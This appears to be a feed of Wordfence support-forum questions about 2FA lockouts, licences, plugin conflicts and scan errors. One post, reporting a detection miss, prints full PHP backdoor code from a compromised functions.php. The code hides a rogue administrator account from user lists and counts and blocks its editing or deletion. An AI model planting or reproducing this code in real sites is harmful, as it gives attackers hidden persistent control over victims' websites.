↧
Did not show the field to fill in 2FA code
↧
MFA Set Up but not allowing code to be entered
Replies: 0
Hi,
I have enabled MFA on our website and have it set up on a Authenticator on my phone for login. However, on logging in it is saying:
“2FA is required to be active on your account. Please contact the site administrator”
There is no option to add in the MFA code.
As I am the site admin, I am not sure what to do here. My web host deactivated WF so I could login and sort it out… Thanks
↧
↧
Delay on firewall rules
Replies: 0
I have a question about the free version of Wordfence. Wordfence states: “The free version includes a 30 day delay on firewall rules and malware detection.” Does this mean that when I include IP-adresses to the whitelist in the Firewall, I have to wait 30 days before this will actually work?
↧
Non-profits
Replies: 0
I work with several non-profits. Is there anything WordFence does for them?
↧
Wordfence login bug
Replies: 0
When I installed Wordfence but after I relogin https://blog.web1expert.com/wp-admin/ it stop me to login without any error… Unless I rename Wordfence folder it won’t allow me to login please help
↧
↧
WORDFENCE LIVE TRAFFIC
Replies: 0
Hello,
Using free version of Wordfence with register key.
I put in options to log all traffic. I am asked to confirm. Ok
Issue is I get no Live Traffic in the sub section under Wordfence. There is no tab.
I clear cache of course (WP FASTEST CACHE). I test in Safari or Chrome. No tab Live Traffic
↧
Issue with FluentCRM Webhook Integration and Wordfence Compatibility
Replies: 0
Hello,
We are using the FluentCRM plugin on our website and integrating it with WP Forms using the following method: Incoming Webhooks
FluentCRM Webhook Integration Documentation
However, this method does not work at all when the Wordfence plugin is enabled. When Wordfence is deactivated, the mentioned method works perfectly fine. It seems that Wordfence is blocking this integration.
The question is: What is the cause of this issue, and what is the appropriate solution to fix it?
Thank you!
↧
Wordfence couldn’t see this hack code!!!
Replies: 0
Hello
i found a hack code on many of websites came to me to handle issues , and i found that Wordfence didn’t even see this code or report that its a meliaceous code that should be removed.
here is the code block which i found in functions.php , and it created an admin user with all administrative permisions
<?php
if (!function_exists(‘wp_enqueue_async_script’) && function_exists(‘add_action’) && function_exists(‘wp_die’) && function_exists(‘get_user_by’) && function_exists(‘is_wp_error’) && function_exists(‘get_current_user_id’) && function_exists(‘get_option’) && function_exists(‘add_action’) && function_exists(‘add_filter’) && function_exists(‘wp_insert_user’) && function_exists(‘update_option’)) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('<span class="count">(', $views['all']);
$count = explode(')</span>', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];
$html = explode('<span class="count">(', $views['administrator']);
$count = explode(')</span>', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}}
↧
blocking dns tunneling
Replies: 0
Is Wordfence able to block dns tunneling, specifically outgoing?
↧
↧
Error Installing License
Replies: 0
i have requested two free licenses for wordfence, but every time i try to install it, either by the quick install button or copy and paste i get the following error.
Error Installing License
An error occurred while installing your license key.
Please try again. If the problem persists, please contact Wordfence Support
↧
Issue with Secure Connection for “aerogcs.com”
Replies: 0
Hello,
I am experiencing an issue with my WordPress website.
- When I directly paste the URL
https://aerogcs.comin the browser, the website opens correctly and functions as expected. - However, if I type only
aerogcs.com(withouthttps://), I encounter an error message stating:
“aerogcs.comdoesn’t support a secure connection.” https://aerogcs.com/wp-content/uploads/2025/01/image-2.jpg
I have an SSL certificate installed, and the secure URL (https://aerogcs.com) works perfectly. It seems the issue might be related to how the domain is redirecting or configured.
Could you please assist in identifying and resolving this issue as soon as possible?
Thank you for your support.
Best regards,
↧
Essential Grid blocked by Wordfence
Replies: 0
Hi community,
I’m using Essential Grid on my website but Wordfence blocks the Grids. If I login with admin-user I can see the grids in preview and live page. Also everything works fine if I deactivate the Wordfence Plugin. Is there any setting I can make so Wordfence won’t block the grids?
↧
Lock Out
Replies: 0
Hi,
Unless Users to a membership site send their IP address beforehand so admin can add them to AllowListed IP list, they can’t login or signup as WF Blocks them?
Is their a solution to this please?
Many Thanks
↧
↧
Vulnerability Link going to ‘wrong plugin’
Replies: 0
Hi+
I have received a vulnerability notice from you regarding the Custom Product Tabs for WooCommerce Plugin. You have that notice on your site here:
So, I followed your link to that plugin and went to their support and found this thread:
According to that plugin author, “The plugin you are referring to is from a different vendor, although the name is indeed similar to ours.”
I have reached out to that plugin author (in that same thread) to ask you to link to the correct vulnerable plugin.
I am, also, reaching out to you so that you are aware. Please advise on which specific plugin is the vulnerable one since that author still has not put out an update to fix the issue.
Thank you.
↧
Users Locked Out – 2FA
Replies: 0
I want to use Wordfence Login Security to force users to use 2FA on our site. I install the plugin and set it up for myself with the QR code in the backend, etc. The problem is that when other users try to sign on the site, they are met with with a message that says:
LOGIN BLOCKED: 2FA is required to be active on your account. Please contact the site administrator.
How do new users set up 2FA? Other plugins I have used for this will typically walk users through the process when they login if they don’t have 2FA set up. I don’t understand how users set up 2FA if they are just met with a “LOGIN BLOCKED” message.
Can someone tell me how to do this? Thanks!
↧
WF Export Token
Replies: 0
Hi! I recently set up a new WordPress website and added the Wordfence plugin to it. Previously, I had successfully configured Wordfence settings on another website, and I want to use those settings on my new site. However, the problem is that my old website is no longer live, and I only have a full backup of the old site. Is it possible to locate the export token within the files of my old site and use that token to apply the settings on my new site? Thank you.
↧
Modified plugin file
Replies: 0
Hi, today I received an email alert from Wordfence reporting these problems:
Medium Severity Problems:
* Modified plugin file: wp-content/plugins/woocommerce/templates/parts/product-filters-overlay.html
* Modified plugin file: wp-content/plugins/woocommerce/templates/parts/product-filters.html
* Modified plugin file: wp-content/plugins/woocommerce/vendor/autoload.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/autoload_packages.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/composer/autoload_classmap.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/composer/autoload_real.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/composer/autoload_static.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/composer/installed.json
* Modified plugin file: wp-content/plugins/woocommerce/vendor/composer/installed.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/composer/jetpack_autoload_classmap.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/composer/jetpack_autoload_filemap.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-autoloader-handler.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-autoloader-locator.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-autoloader.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-container.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-hook-manager.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-latest-autoloader-guard.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-manifest-reader.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-path-processor.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-php-autoloader.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-plugin-locator.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-plugins-handler.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-shutdown-handler.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-version-loader.php
* Modified plugin file: wp-content/plugins/woocommerce/vendor/jetpack-autoloader/class-version-selector.php
I had updated Woocommerce manually from ftp to 9.4.3 on Monday. Since it told me about the update to 9.5.2, I updated from the backend to the new version. Did I do well? Could there be some problem? I later ran a High Sensitivity scan and it found nothing.
Thanks so much for the support.
↧
↧
Wordfence stops working after showing some errors
Replies: 0
- The error showed these and the scan stopped
[Jan 10 10:34:20] Attempting to resume scan stage (1 attempt(s) remaining)…- [Jan 10 10:34:20] Entering start scan routine
- [Jan 10 10:34:20] Got value from wf config maxExecutionTime: 0
- [Jan 10 10:34:20] Got max_execution_time value from ini: 50000
- [Jan 10 10:34:20] ini value of 50000 is higher than value for WORDFENCE_SCAN_MAX_INI_EXECUTION_TIME (90), reducing
- [Jan 10 10:34:20] getMaxExecutionTime() returning half ini value: 45
- [Jan 10 10:34:20] Starting cron via proxy at URL https://noc1.wordfence.com/scanp/theyoungtravelers.world/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=standard&cronKey=f3813b5b7c955818a632363939eb2430&k=65cd03060f5b73be040841a8bd12f1babdecdb6e4c86e6047a5ed6d4683667411e18d11b6aec840cefb0b295f670d37d25d9de257b38f477cc7d0bb6b4d1d358&ssl=1&signature=966b872cbf03d000e4f33c1f6ff83e42e559b03eb0d203a872e781ce05c4cc60
- [Jan 10 10:34:21] Scan stop request received.
- [Jan 10 10:34:21] Scan process ended after forking.
↧
Reducing email notifications for WordPress actions
Replies: 0
Hi… I am getting excessive email notifications for things like ‘”Auto Draft” was updated’.
I could swear I have seen a settings page in WordFence that allowed me to select/deselect which activities should be notified. But now I cannot find it – despite hours searching. Please can SKS point me to it? (I am using the free version of WordFence.)
Also, these emails are being sent to the WordPress site email administration address. I have set a different address in General Wordfence Options but that does not seem to have any effect.
Advice please.
WP 6.7
PHP 8.3
WordFence 8.0.2
↧
Entire WordFence Dashboard Suddenly Appears in Unknown Foreign Language
Replies: 0
I don’t even really know how to explain this issue – basically my entire wordfence dashboard has been converted to some other language I can’t even identify.
It seems to be affecting all the body text (not headings). Please see image in link for an example.
↧